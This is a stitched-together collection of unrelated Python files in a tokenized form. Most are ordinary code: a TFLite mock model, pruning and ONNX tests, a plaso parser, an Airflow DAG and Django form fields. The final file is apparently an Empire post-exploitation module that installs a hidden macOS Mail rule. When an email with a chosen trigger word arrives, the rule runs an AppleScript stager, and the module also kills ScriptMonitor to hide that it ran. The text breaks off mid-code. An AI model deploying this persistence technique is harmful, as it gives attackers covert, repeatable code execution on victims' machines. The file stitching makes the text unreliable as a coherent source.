5)<line_sep>builder.PrependFloat32(3.0)<line_sep>builder.PrependFloat32(4.0)<line_sep>builder.PrependFloat32(5.0)<line_sep>builder.PrependFloat32(6.0)<line_sep>builder.PrependFloat32(7.0)<line_sep>quant1_scale_offset=builder.EndVector(5)<line_sep>schema_fb.QuantizationParametersStartZeroPointVector(builder 5)<line_sep>builder.PrependInt64(1)<line_sep>builder.PrependInt64(2)<line_sep>builder.PrependInt64(3)<line_sep>builder.PrependInt64(-1)<line_sep>builder.PrependInt64(-2)<line_sep>quant1_zero_point_offset=builder.EndVector(5)<line_sep>schema_fb.QuantizationParametersStart(builder)<line_sep>schema_fb.QuantizationParametersAddMin(builder quant1_min_offset)<line_sep>schema_fb.QuantizationParametersAddMax(builder quant1_max_offset)<line_sep>schema_fb.QuantizationParametersAddScale(builder quant1_scale_offset)<line_sep>schema_fb.QuantizationParametersAddZeroPoint(builder 
quant1_zero_point_offset)<line_sep>quantization1_offset=schema_fb.QuantizationParametersEnd(builder)<line_sep>string1_offset=builder.CreateString('constant_tensor')<line_sep>schema_fb.TensorStartShapeVector(builder 3)<line_sep>builder.PrependInt32(1)<line_sep>builder.PrependInt32(2)<line_sep>builder.PrependInt32(5)<line_sep>shape1_offset=builder.EndVector(3)<line_sep>schema_fb.TensorStart(builder)<line_sep>schema_fb.TensorAddName(builder string1_offset)<line_sep>schema_fb.TensorAddShape(builder shape1_offset)<line_sep>schema_fb.TensorAddType(builder 0)<line_sep>schema_fb.TensorAddBuffer(builder 1)<line_sep>schema_fb.TensorAddQuantization(builder quantization1_offset)<line_sep>tensor1_offset=schema_fb.TensorEnd(builder)<line_sep>string2_offset=builder.CreateString('output_tensor')<line_sep>schema_fb.TensorStartShapeVector(builder 3)<line_sep>builder.PrependInt32(1)<line_sep>builder.PrependInt32(2)<line_sep>builder.PrependInt32(5)<line_sep>shape2_offset=builder.EndVector(3)<line_sep>schema_fb.TensorStart(builder)<line_sep>schema_fb.TensorAddName(builder string2_offset)<line_sep>schema_fb.TensorAddShape(builder shape2_offset)<line_sep>schema_fb.TensorAddType(builder 0)<line_sep>schema_fb.TensorAddBuffer(builder 2)<line_sep>tensor2_offset=schema_fb.TensorEnd(builder)<line_sep>schema_fb.SubGraphStartTensorsVector(builder 3)<line_sep>builder.PrependUOffsetTRelative(tensor2_offset)<line_sep>builder.PrependUOffsetTRelative(tensor1_offset)<line_sep>builder.PrependUOffsetTRelative(tensor0_offset)<line_sep>tensors_offset=builder.EndVector(3)<line_sep>schema_fb.SubGraphStartInputsVector(builder 1)<line_sep>builder.PrependInt32(0)<line_sep>inputs_offset=builder.EndVector(1)<line_sep>schema_fb.SubGraphStartOutputsVector(builder 1)<line_sep>builder.PrependInt32(2)<line_sep>outputs_offset=builder.EndVector(1)<line_sep>schema_fb.OperatorCodeStart(builder)<line_sep>schema_fb.OperatorCodeAddBuiltinCode(builder schema_fb.BuiltinOperator.ADD)<line_sep>schema_fb.OperatorCodeAddDeprecatedBuiltinCode(builder schema_fb.BuiltinOperator.ADD)<line_sep>schema_fb.OperatorCodeAddVersion(builder 1)<line_sep>code_offset=schema_fb.OperatorCodeEnd(builder)<line_sep>schema_fb.ModelStartOperatorCodesVector(builder 1)<line_sep>builder.PrependUOffsetTRelative(code_offset)<line_sep>codes_offset=builder.EndVector(1)<line_sep>schema_fb.OperatorStartInputsVector(builder 2)<line_sep>builder.PrependInt32(0)<line_sep>builder.PrependInt32(1)<line_sep>op_inputs_offset=builder.EndVector(2)<line_sep>schema_fb.OperatorStartOutputsVector(builder 1)<line_sep>builder.PrependInt32(2)<line_sep>op_outputs_offset=builder.EndVector(1)<line_sep>schema_fb.OperatorStart(builder)<line_sep>schema_fb.OperatorAddOpcodeIndex(builder 0)<line_sep>schema_fb.OperatorAddInputs(builder op_inputs_offset)<line_sep>schema_fb.OperatorAddOutputs(builder op_outputs_offset)<line_sep>op_offset=schema_fb.OperatorEnd(builder)<line_sep>schema_fb.SubGraphStartOperatorsVector(builder 1)<line_sep>builder.PrependUOffsetTRelative(op_offset)<line_sep>ops_offset=builder.EndVector(1)<line_sep>string3_offset=builder.CreateString('subgraph_name')<line_sep>schema_fb.SubGraphStart(builder)<line_sep>schema_fb.SubGraphAddName(builder string3_offset)<line_sep>schema_fb.SubGraphAddTensors(builder tensors_offset)<line_sep>schema_fb.SubGraphAddInputs(builder inputs_offset)<line_sep>schema_fb.SubGraphAddOutputs(builder outputs_offset)<line_sep>schema_fb.SubGraphAddOperators(builder 
ops_offset)<line_sep>subgraph_offset=schema_fb.SubGraphEnd(builder)<line_sep>schema_fb.ModelStartSubgraphsVector(builder 1)<line_sep>builder.PrependUOffsetTRelative(subgraph_offset)<line_sep>subgraphs_offset=builder.EndVector(1)<line_sep>signature_key=builder.CreateString('my_key')<line_sep>input_tensor_string=builder.CreateString('input_tensor')<line_sep>output_tensor_string=builder.CreateString('output_tensor')<line_sep># Signature Inputs
schema_fb.TensorMapStart(builder)<line_sep>schema_fb.TensorMapAddName(builder input_tensor_string)<line_sep>schema_fb.TensorMapAddTensorIndex(builder 1)<line_sep>input_tensor=schema_fb.TensorMapEnd(builder)<line_sep># Signature Outputs
schema_fb.TensorMapStart(builder)<line_sep>schema_fb.TensorMapAddName(builder output_tensor_string)<line_sep>schema_fb.TensorMapAddTensorIndex(builder 2)<line_sep>output_tensor=schema_fb.TensorMapEnd(builder)<line_sep>schema_fb.SignatureDefStartInputsVector(builder 1)<line_sep>builder.PrependUOffsetTRelative(input_tensor)<line_sep>signature_inputs_offset=builder.EndVector(1)<line_sep>schema_fb.SignatureDefStartOutputsVector(builder 1)<line_sep>builder.PrependUOffsetTRelative(output_tensor)<line_sep>signature_outputs_offset=builder.EndVector(1)<line_sep>schema_fb.SignatureDefStart(builder)<line_sep>schema_fb.SignatureDefAddSignatureKey(builder signature_key)<line_sep>schema_fb.SignatureDefAddInputs(builder signature_inputs_offset)<line_sep>schema_fb.SignatureDefAddOutputs(builder signature_outputs_offset)<line_sep>signature_offset=schema_fb.SignatureDefEnd(builder)<line_sep>schema_fb.ModelStartSignatureDefsVector(builder 1)<line_sep>builder.PrependUOffsetTRelative(signature_offset)<line_sep>signature_defs_offset=builder.EndVector(1)<line_sep>string4_offset=builder.CreateString('model_description')<line_sep>schema_fb.ModelStart(builder)<line_sep>schema_fb.ModelAddVersion(builder TFLITE_SCHEMA_VERSION)<line_sep>schema_fb.ModelAddOperatorCodes(builder codes_offset)<line_sep>schema_fb.ModelAddSubgraphs(builder subgraphs_offset)<line_sep>schema_fb.ModelAddDescription(builder string4_offset)<line_sep>schema_fb.ModelAddBuffers(builder buffers_offset)<line_sep>schema_fb.ModelAddSignatureDefs(builder signature_defs_offset)<line_sep>model_offset=schema_fb.ModelEnd(builder)<line_sep>builder.Finish(model_offset)<line_sep>model=builder.Output()<line_sep><return>model<block_end><def_stmt>load_model_from_flatbuffer flatbuffer_model<block_start>"""Loads a model as a python object from a flatbuffer model."""<line_sep>model=schema_fb.Model.GetRootAsModel(flatbuffer_model 0)<line_sep>model=schema_fb.ModelT.InitFromObj(model)<line_sep><return>model<block_end><def_stmt>build_mock_model <block_start>"""Creates an object containing an example model."""<line_sep>model=build_mock_flatbuffer_model()<line_sep><return>load_model_from_flatbuffer(model)<block_end> |
<import_stmt>pkg_resources<line_sep>pkg_resources.declare_namespace(__name__)<import_from_stmt>.namegen NameGenerator<line_sep>namegen=NameGenerator()<line_sep> |
"""
Copyright (c) 2021 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""<import_stmt>pytest<import_stmt>numpy<as>np<import_from_stmt>nncf.torch.pruning.filter_pruning.algo FilterPruningController<import_from_stmt>tests.torch.helpers create_compressed_model_and_algo_for_test<import_from_stmt>tests.torch.helpers check_correct_nncf_modules_replacement<import_from_stmt>tests.torch.pruning.helpers get_basic_pruning_config<import_from_stmt>tests.torch.pruning.helpers BigPruningTestModel<def_stmt>create_pruning_algo_with_config config<block_start>"""
Create filter_pruning with default params.
:param config: config for the algorithm
:return: pruned_model, pruning_algo, nncf_modules
"""<line_sep>config['compression']['algorithm']='filter_pruning'<line_sep>model=BigPruningTestModel()<line_sep>pruned_model,pruning_algo=create_compressed_model_and_algo_for_test(BigPruningTestModel() config)<line_sep># Check that all modules was correctly replaced by NNCF modules and return this NNCF modules
_,nncf_modules=check_correct_nncf_modules_replacement(model pruned_model)<line_sep><return>pruned_model pruning_algo nncf_modules<block_end>@pytest.mark.parametrize(('all_weights' 'pruning_rate_to_set' 'ref_pruning_rates' 'ref_global_pruning_rate') [(<false> 0.5 [0.5 0.5] 0.5) (<true> 0.5 [0.28125 0.60937] 0.5) (<false> {0:0.6 1:0.8} [0.5 0.75] 0.69986) ])<def_stmt>test_setting_pruning_rate all_weights pruning_rate_to_set ref_pruning_rates ref_global_pruning_rate<block_start>"""
Test setting global and groupwise pruning rates via the set_pruning_rate method.
"""<line_sep># Creating algorithm with empty config
config=get_basic_pruning_config(input_sample_size=[1 1 8 8])<line_sep>config['compression']['pruning_init']=0.2<line_sep>config['compression']['params']['all_weights']=all_weights<line_sep>_,pruning_controller,_=create_pruning_algo_with_config(config)<assert_stmt>isinstance(pruning_controller FilterPruningController)<line_sep>pruning_controller.set_pruning_rate(pruning_rate_to_set)<line_sep>groupwise_pruning_rates=list(pruning_controller.current_groupwise_pruning_rate.values())<assert_stmt>np.isclose(groupwise_pruning_rates ref_pruning_rates).all()<assert_stmt>np.isclose(pruning_controller.pruning_rate ref_global_pruning_rate).all()<block_end><def_stmt>test_can_set_compression_rate_in_filter_pruning_algo <block_start>"""
Test setting the global pruning rate via the compression_rate property.
"""<line_sep># Creating algorithm with empty config
config=get_basic_pruning_config(input_sample_size=[1 1 8 8])<line_sep>config['compression']['pruning_init']=0.2<line_sep>_,pruning_controller,_=create_pruning_algo_with_config(config)<line_sep>pruning_controller.compression_rate=0.65<assert_stmt>pytest.approx(pruning_controller.compression_rate 1e-2)<eq>0.65<block_end> |
# -*- coding: utf-8 -*-
"""Parser for NetworkMiner .fileinfos files."""<import_from_stmt>dfdatetime time_elements<as>dfdatetime_time_elements<import_from_stmt>plaso.containers events<import_from_stmt>plaso.containers time_events<import_from_stmt>plaso.lib definitions<import_from_stmt>plaso.parsers dsv_parser<import_from_stmt>plaso.parsers manager<class_stmt>NetworkMinerEventData(events.EventData)<block_start>"""NetworkMiner event Data.
Attributes:
destination_ip (str): Destination IP address.
destination_port (str): Destination port number.
file_details (string): Details about the file.
file_md5 (string): MD5 hash of the file.
file_path (string): File path to where it was downloaded.
file_size (string): Size of the file.
filename (string): Name of the file.
source_ip (str): Originating IP address.
source_port (str): Originating port number.
"""<line_sep>DATA_TYPE='networkminer:fileinfos:file'<def_stmt>__init__ self<block_start>super(NetworkMinerEventData self).__init__(data_type=self.DATA_TYPE)<line_sep>self.destination_ip=<none><line_sep>self.destination_port=<none><line_sep>self.file_details=<none><line_sep>self.file_md5=<none><line_sep>self.file_path=<none><line_sep>self.file_size=<none><line_sep>self.filename=<none><line_sep>self.source_ip=<none><line_sep>self.source_port=<none><block_end><block_end><class_stmt>NetworkMinerParser(dsv_parser.DSVParser)<block_start>"""Parser for NetworkMiner .fileinfos files."""<line_sep>NAME='networkminer_fileinfo'<line_sep>DATA_FORMAT='NetworkMiner .fileinfos file'<line_sep>COLUMNS=('source_ip' 'source_port' 'destination_ip' 'destination_port' 'filename' 'file_path' 'file_size' 'unused' 'file_md5' 'unused2' 'file_details' 'unused4' 'timestamp')<line_sep>MIN_COLUMNS=13<def_stmt>ParseRow self parser_mediator row_offset row<block_start>"""Parses a line of the log file and produces events.
Args:
parser_mediator (ParserMediator): mediates interactions between parsers
and other components, such as storage and dfvfs.
row_offset (int): line number of the row.
row (dict[str, str]): fields of a single row, as specified in COLUMNS.
"""<line_sep>event_data=NetworkMinerEventData()<if_stmt>row.get('timestamp' <none>)<ne>'Timestamp'<block_start>date_time=dfdatetime_time_elements.TimeElementsInMicroseconds()<for_stmt>field ('source_ip' 'source_port' 'destination_ip' 'destination_port' 'filename' 'file_path' 'file_size' 'file_md5' 'file_details')<block_start>setattr(event_data field row[field])<block_end><try_stmt><block_start>timestamp=row.get('timestamp' <none>)<line_sep>date_time.CopyFromStringISO8601(timestamp)<block_end><except_stmt>ValueError<block_start>parser_mediator.ProduceExtractionWarning('invalid date time value')<line_sep><return><block_end>event=time_events.DateTimeValuesEvent(date_time definitions.TIME_DESCRIPTION_WRITTEN)<line_sep>parser_mediator.ProduceEventWithEventData(event event_data)<block_end><block_end><def_stmt>VerifyRow self parser_mediator row<block_start>"""Verifies if a line of the file is in the expected format.
Args:
parser_mediator (ParserMediator): mediates interactions between parsers
and other components, such as storage and dfvfs.
row (dict[str, str]): fields of a single row, as specified in COLUMNS.
Returns:
bool: True if this is the correct parser, False otherwise.
"""<if_stmt>len(row)<ne>self.MIN_COLUMNS<block_start><return><false><block_end># Check the date format
# If it doesn't parse, then this isn't a NetworkMiner .fileinfos file.
timestamp_value=row.get('timestamp' <none>)<if_stmt>timestamp_value<ne>'Timestamp'<block_start>date_time=dfdatetime_time_elements.TimeElementsInMicroseconds()<try_stmt><block_start>date_time.CopyFromStringISO8601(timestamp_value)<block_end><except_stmt>ValueError<block_start><return><false><block_end><block_end><return><true><block_end><block_end>manager.ParsersManager.RegisterParser(NetworkMinerParser)<line_sep> |
<import_stmt>airflow<import_from_stmt>airflow DAG<import_from_stmt>airflow.operators.dummy DummyOperator<import_from_stmt>airflow.operators.python PythonOperator<line_sep>ERP_CHANGE_DATE=airflow.utils.dates.days_ago(1)<def_stmt>_fetch_sales **context<block_start><if_stmt>context["execution_date"]<l>ERP_CHANGE_DATE<block_start>_fetch_sales_old(**context)<block_end><else_stmt><block_start>_fetch_sales_new(**context)<block_end><block_end><def_stmt>_fetch_sales_old **context<block_start>print("Fetching sales data (OLD)...")<block_end><def_stmt>_fetch_sales_new **context<block_start>print("Fetching sales data (NEW)...")<block_end><def_stmt>_clean_sales **context<block_start><if_stmt>context["execution_date"]<l>airflow.utils.dates.days_ago(1)<block_start>_clean_sales_old(**context)<block_end><else_stmt><block_start>_clean_sales_new(**context)<block_end><block_end><def_stmt>_clean_sales_old **context<block_start>print("Preprocessing sales data (OLD)...")<block_end><def_stmt>_clean_sales_new **context<block_start>print("Preprocessing sales data (NEW)...")<block_end><with_stmt>DAG(dag_id="02_branch_function" start_date=airflow.utils.dates.days_ago(3) schedule_interval="@daily" )<as>dag<block_start>start=DummyOperator(task_id="start")<line_sep>fetch_sales=PythonOperator(task_id="fetch_sales" python_callable=_fetch_sales)<line_sep>clean_sales=PythonOperator(task_id="clean_sales" python_callable=_clean_sales)<line_sep>fetch_weather=DummyOperator(task_id="fetch_weather")<line_sep>clean_weather=DummyOperator(task_id="clean_weather")<line_sep>join_datasets=DummyOperator(task_id="join_datasets")<line_sep>train_model=DummyOperator(task_id="train_model")<line_sep>deploy_model=DummyOperator(task_id="deploy_model")<line_sep>start<rshift>[fetch_sales fetch_weather]<line_sep>fetch_sales<rshift>clean_sales<line_sep>fetch_weather<rshift>clean_weather<line_sep>[clean_sales clean_weather]<rshift>join_datasets<line_sep>join_datasets<rshift>train_model<rshift>deploy_model<block_end> |
# Copyright (C) 2018-2022 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
<import_stmt>pytest<import_from_stmt>common.onnx_layer_test_class Caffe2OnnxLayerTest<class_stmt>TestSqueeze(Caffe2OnnxLayerTest)<block_start><def_stmt>create_squeeze_net self axes input_shape output_shape ir_version<block_start>"""
ONNX net IR net
Input->Squeeze(axes=0)->Output => Input->Reshape
"""<line_sep>#
# Create ONNX model
#
<import_stmt>onnx<import_from_stmt>onnx helper<import_from_stmt>onnx TensorProto<line_sep>input=helper.make_tensor_value_info('input' TensorProto.FLOAT input_shape)<line_sep>output=helper.make_tensor_value_info('output' TensorProto.FLOAT output_shape)<line_sep>node_squeeze_def=onnx.helper.make_node('Squeeze' inputs=['input'] outputs=['output'] axes=axes)<line_sep># Create the graph (GraphProto)
graph_def=helper.make_graph([node_squeeze_def] 'test_squeeze_model' [input] [output] )<line_sep># Create the model (ModelProto)
onnx_net=helper.make_model(graph_def producer_name='test_squeeze_model')<line_sep>#
# Create reference IR net
# Please, specify 'type': 'Input' for input node
# Moreover, do not forget to validate ALL layer attributes!!!
#
ref_net=<none><line_sep><return>onnx_net ref_net<block_end><def_stmt>create_squeeze_net_const self axes input_shape output_shape ir_version<block_start>"""
ONNX net IR net
Input->Concat(+squeezed const)->Output => Input->Concat(+const)
"""<line_sep>#
# Create ONNX model
#
<import_stmt>onnx<import_from_stmt>onnx helper<import_from_stmt>onnx TensorProto<import_stmt>numpy<as>np<line_sep>concat_axis=0<line_sep>concat_output_shape=output_shape.copy()<line_sep>concat_output_shape[concat_axis]<augmul>2<line_sep>input=helper.make_tensor_value_info('input' TensorProto.FLOAT output_shape)<line_sep>output=helper.make_tensor_value_info('output' TensorProto.FLOAT concat_output_shape)<line_sep>const_number=np.prod(input_shape)<line_sep>constant=np.random.randint(-127 127 const_number).astype(np.float)<line_sep>constant=np.reshape(constant input_shape)<line_sep>node_const_def=onnx.helper.make_node('Constant' inputs=[] outputs=['const1'] value=helper.make_tensor(name='const_tensor' data_type=TensorProto.FLOAT dims=constant.shape vals=constant.flatten() ) )<line_sep>node_squeeze_def=onnx.helper.make_node('Squeeze' inputs=['const1'] outputs=['squeeze1'] axes=axes)<line_sep>node_concat_def=onnx.helper.make_node('Concat' inputs=['input' 'squeeze1'] outputs=['output'] axis=concat_axis)<line_sep># Create the graph (GraphProto)
graph_def=helper.make_graph([node_const_def node_squeeze_def node_concat_def] 'test_squeeze_model' [input] [output] )<line_sep># Create the model (ModelProto)
onnx_net=helper.make_model(graph_def producer_name='test_squeeze_model')<line_sep>#
# Create reference IR net
# Please, specify 'type': 'Input' for input node
# Moreover, do not forget to validate ALL layer attributes!!!
#
ref_net=<none><line_sep><return>onnx_net ref_net<block_end>test_data_5D=[dict(axes=[0] input_shape=[1 2 3 10 10] output_shape=[2 3 10 10]) dict(axes=[1] input_shape=[2 1 3 10 10] output_shape=[2 3 10 10]) dict(axes=[2] input_shape=[2 3 1 10 10] output_shape=[2 3 10 10]) dict(axes=[3] input_shape=[2 3 10 1 10] output_shape=[2 3 10 10]) dict(axes=[4] input_shape=[2 3 10 10 1] output_shape=[2 3 10 10]) dict(axes=[0 1] input_shape=[1 1 3 10 10] output_shape=[3 10 10]) dict(axes=[0 2] input_shape=[1 3 1 10 10] output_shape=[3 10 10]) dict(axes=[0 3] input_shape=[1 3 10 1 10] output_shape=[3 10 10]) dict(axes=[0 4] input_shape=[1 3 10 10 1] output_shape=[3 10 10]) dict(axes=[1 2] input_shape=[3 1 1 10 10] output_shape=[3 10 10]) dict(axes=[1 3] input_shape=[3 1 10 1 10] output_shape=[3 10 10]) dict(axes=[1 4] input_shape=[3 1 10 10 1] output_shape=[3 10 10]) dict(axes=[2 3] input_shape=[3 10 1 1 10] output_shape=[3 10 10]) dict(axes=[2 4] input_shape=[3 10 1 10 1] output_shape=[3 10 10]) dict(axes=[3 4] input_shape=[3 10 10 1 1] output_shape=[3 10 10]) dict(axes=[0 1 2] input_shape=[1 1 1 10 10] output_shape=[10 10]) dict(axes=[0 1 3] input_shape=[1 1 10 1 10] output_shape=[10 10]) dict(axes=[0 1 4] input_shape=[1 1 10 10 1] output_shape=[10 10]) dict(axes=[0 2 3] input_shape=[1 10 1 1 10] output_shape=[10 10]) dict(axes=[0 2 4] input_shape=[1 10 1 10 1] output_shape=[10 10]) dict(axes=[0 3 4] input_shape=[1 10 10 1 1] output_shape=[10 10]) dict(axes=[1 2 3] input_shape=[10 1 1 1 10] output_shape=[10 10]) dict(axes=[1 2 4] input_shape=[10 1 1 10 1] output_shape=[10 10]) dict(axes=[1 3 4] input_shape=[10 1 10 1 1] output_shape=[10 10]) dict(axes=[2 3 4] input_shape=[10 10 1 1 1] output_shape=[10 10])]<line_sep>test_data_4D=[dict(axes=[0] input_shape=[1 3 10 10] output_shape=[3 10 10]) dict(axes=[1] input_shape=[3 1 10 10] output_shape=[3 10 10]) dict(axes=[2] input_shape=[3 10 1 10] output_shape=[3 10 10]) dict(axes=[3] input_shape=[3 10 10 1] output_shape=[3 10 10]) dict(axes=[0 1] input_shape=[1 1 10 10] output_shape=[10 10]) dict(axes=[0 2] input_shape=[1 10 1 10] output_shape=[10 10]) dict(axes=[0 3] input_shape=[1 10 10 1] output_shape=[10 10]) dict(axes=[1 2] input_shape=[10 1 1 10] output_shape=[10 10]) dict(axes=[1 3] input_shape=[10 1 10 1] output_shape=[10 10]) dict(axes=[2 3] input_shape=[10 10 1 1] output_shape=[10 10])]<line_sep>test_data_3D=[dict(axes=[0] input_shape=[1 10 10] output_shape=[10 10]) dict(axes=[1] input_shape=[10 1 10] output_shape=[10 10]) dict(axes=[2] input_shape=[10 10 1] output_shape=[10 10])]<line_sep>@pytest.mark.parametrize("params" test_data_5D)@pytest.mark.nightly<def_stmt>test_squeeze_5D self params ie_device precision ir_version temp_dir api_2<block_start>self._test(*self.create_squeeze_net(**params ir_version=ir_version) ie_device precision ir_version temp_dir=temp_dir api_2=api_2)<block_end>@pytest.mark.parametrize("params" test_data_4D)@pytest.mark.nightly<def_stmt>test_squeeze_4D self params ie_device precision ir_version temp_dir api_2<block_start>self._test(*self.create_squeeze_net(**params ir_version=ir_version) ie_device precision ir_version temp_dir=temp_dir api_2=api_2)<block_end>@pytest.mark.parametrize("params" test_data_3D)@pytest.mark.nightly<def_stmt>test_squeeze_3D self params ie_device precision ir_version temp_dir api_2<block_start>self._test(*self.create_squeeze_net(**params ir_version=ir_version) ie_device precision ir_version temp_dir=temp_dir api_2=api_2)<block_end>@pytest.mark.parametrize("params" 
test_data_5D)@pytest.mark.nightly<def_stmt>test_squeeze_const_5D self params ie_device precision ir_version temp_dir api_2<block_start>self._test(*self.create_squeeze_net_const(**params ir_version=ir_version) ie_device precision ir_version temp_dir=temp_dir api_2=api_2)<block_end>@pytest.mark.parametrize("params" test_data_4D)@pytest.mark.nightly<def_stmt>test_squeeze_const_4D self params ie_device precision ir_version temp_dir api_2<block_start>self._test(*self.create_squeeze_net_const(**params ir_version=ir_version) ie_device precision ir_version temp_dir=temp_dir api_2=api_2)<block_end>@pytest.mark.parametrize("params" test_data_3D)@pytest.mark.nightly<def_stmt>test_squeeze_const_3D self params ie_device precision ir_version temp_dir api_2<block_start>self._test(*self.create_squeeze_net_const(**params ir_version=ir_version) ie_device precision ir_version temp_dir=temp_dir api_2=api_2)<block_end><block_end> |
<import_from_stmt>django forms<import_from_stmt>django.core.exceptions ImproperlyConfigured<import_from_stmt>mayan.apps.acls.models AccessControlList<class_stmt>FilteredModelFieldMixin<block_start><def_stmt>__init__ self *args **kwargs<block_start>self.source_model=kwargs.pop('source_model' <none>)<line_sep>self.permission=kwargs.pop('permission' <none>)<line_sep>self.source_queryset=kwargs.pop('source_queryset' <none>)<if_stmt>self.source_queryset<is><none><block_start><if_stmt>self.source_model<block_start>self.source_queryset=self.source_model._meta.default_manager.all()<block_end><else_stmt><block_start><raise>ImproperlyConfigured('{} requires a source_queryset or a source_model to be '<concat>'specified as keyword argument.'.format(self.__class__.__name__))<block_end><block_end>kwargs['queryset']=self.source_queryset.none()<line_sep>super().__init__(*args **kwargs)<block_end><def_stmt>reload self<block_start><if_stmt>self.permission<and>self.user<block_start>self.queryset=AccessControlList.objects.restrict_queryset(permission=self.permission queryset=self.source_queryset user=self.user)<block_end><else_stmt><block_start>self.queryset=self.source_queryset<block_end><block_end><block_end><class_stmt>FilteredModelChoiceField(FilteredModelFieldMixin forms.ModelChoiceField)<block_start>"""Single selection filtered model choice field"""<block_end><class_stmt>FilteredModelMultipleChoiceField(FilteredModelFieldMixin forms.ModelMultipleChoiceField)<block_start>"""Multiple selection filtered model choice field"""<block_end> |
<import_from_stmt>time time<import_from_stmt>random choice<import_from_stmt>string ascii_uppercase<class_stmt>Module<block_start><def_stmt>__init__ self mainMenu params=[]# metadata info about the module, not modified during runtime
<block_start>self.info={# name for the module that will appear in module menus
'Name':'Mail' # list of one or more authors for the module
'Author':['@n00py'] # more verbose multi-line description of the module
'Description':('Installs a mail rule that will execute an AppleScript stager when a trigger word is present in the Subject of an incoming mail.') # True if the module needs to run in the background
'Background':<false> # File extension to save the file as
'OutputExtension':<none> # if the module needs administrative privileges
'NeedsAdmin':<false> # True if the method doesn't touch disk/is reasonably opsec safe
'OpsecSafe':<false> # the module language
'Language':'python' # the minimum language version needed
'MinLanguageVersion':'2.6' # list of any references/other comments
'Comments':['https://github.com/n00py/MailPersist']}<line_sep># any options needed by the module, settable during runtime
self.options={# format:
# value_name : {description, required, default_value}
'Agent':{# The 'Agent' option is the only one that MUST be in a module
'Description':'Agent to execute module on.' 'Required':<true> 'Value':''} 'Listener':{'Description':'Listener to use.' 'Required':<true> 'Value':''} 'SafeChecks':{'Description':'Switch. Checks for LittleSnitch or a SandBox, exit the staging process if true. Defaults to True.' 'Required':<true> 'Value':'True'} 'UserAgent':{'Description':'User-agent string to use for the staging request (default, none, or other).' 'Required':<false> 'Value':'default'} 'RuleName':{'Description':'Name of the Rule.' 'Required':<true> 'Value':'Spam Filter'} 'Trigger':{'Description':'The trigger word.' 'Required':<true> 'Value':''}}<line_sep>#
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu=mainMenu<line_sep># During instantiation, any settable option parameters
# are passed as an object set to the module and the
# options dictionary is automatically set. This is mostly
# in case options are passed on the command line
<if_stmt>params<block_start><for_stmt>param params# parameter format is [Name, Value]
<block_start>option,value=param<if_stmt>option<in>self.options<block_start>self.options[option]['Value']=value<block_end><block_end><block_end><block_end><def_stmt>generate self obfuscate=<false> obfuscationCommand=""<block_start>ruleName=self.options['RuleName']['Value']<line_sep>trigger=self.options['Trigger']['Value']<line_sep>listenerName=self.options['Listener']['Value']<line_sep>userAgent=self.options['UserAgent']['Value']<line_sep>safeChecks=self.options['SafeChecks']['Value']<line_sep>launcher=self.mainMenu.stagers.generate_launcher(listenerName language='python' userAgent=userAgent safeChecks=safeChecks)<line_sep>launcher=launcher.replace('"' '\\"')<line_sep>launcher=launcher.replace('"' '\\"')<line_sep>launcher="do shell script \"%s\""%(launcher)<line_sep>hex='0123456789ABCDEF'<def_stmt>UUID <block_start><return>''.join([choice(hex)<for>x range(8)])+"-"+''.join([choice(hex)<for>x range(4)])+"-"+''.join([choice(hex)<for>x range(4)])+"-"+''.join([choice(hex)<for>x range(4)])+"-"+''.join([choice(hex)<for>x range(12)])<block_end>CriterionUniqueId=UUID()<line_sep>RuleId=UUID()<line_sep>TimeStamp=str(int(time()))[0:9]<line_sep>SyncedRules="/tmp/"+''.join(choice(ascii_uppercase)<for>i range(12))<line_sep>RulesActiveState="/tmp/"+''.join(choice(ascii_uppercase)<for>i range(12))<line_sep>AppleScript=''.join(choice(ascii_uppercase)<for>i range(12))+".scpt"<line_sep>plist='''<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<array>
<dict>
<key>AllCriteriaMustBeSatisfied</key>
<string>NO</string>
<key>AppleScript</key>
<string>'''+AppleScript+'''</string>
<key>AutoResponseType</key>
<integer>0</integer>
<key>Criteria</key>
<array>
<dict>
<key>CriterionUniqueId</key>
<string>'''+CriterionUniqueId+'''</string>
<key>Expression</key>
<string>'''+str(trigger)+'''</string>
<key>Header</key>
<string>Subject</string>
</dict>
</array>
<key>Deletes</key>
<string>YES</string>
<key>HighlightTextUsingColor</key>
<string>NO</string>
<key>MarkFlagged</key>
<string>NO</string>
<key>MarkRead</key>
<string>NO</string>
<key>NotifyUser</key>
<string>NO</string>
<key>RuleId</key>
<string>'''+RuleId+'''</string>
<key>RuleName</key>
<string>'''+str(ruleName)+'''</string>
<key>SendNotification</key>
<string>NO</string>
<key>ShouldCopyMessage</key>
<string>NO</string>
<key>ShouldTransferMessage</key>
<string>NO</string>
<key>TimeStamp</key>
<integer>'''+TimeStamp+'''</integer>
<key>Version</key>
<integer>1</integer>
</dict>
</array>
</plist>'''<line_sep>plist2='''<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>'''+RuleId+'''</key>
<true/>
</dict>
</plist>
'''<line_sep>script="""
import os
home = os.getenv("HOME")
AppleScript = '%s'
SyncedRules = '%s'
RulesActiveState = '%s'
plist = \"\"\"%s\"\"\"
plist2 = \"\"\"%s\"\"\"
payload = \'\'\'%s\'\'\'
payload = payload.replace('&\"', '& ')
payload += "kill `ps -ax | grep ScriptMonitor |grep -v grep | awk \'{print $1}\'`"
payload += '\"'
script = home + "/Library/Application Scripts/com.apple.mail/" + AppleScript
os.system("touch " + SyncedRules)
with open(SyncedRules, 'w+') as f:
f.write(plist)
f.close()
os.system("touch " + RulesActiveState)
with open(RulesActiveState, 'w+') as f:
f.write(plist2)
f.close()
with open(script, 'w+') as f:
f.write(payload)
f.close()
with open("/System/Library/CoreServices/SystemVersion.plist", 'r') as a:
v = a.read()
version = "V1"
if "10.7" in v:
version = "V2"
if "10.7" in v:
version = "V2"
if "10.8" in v:
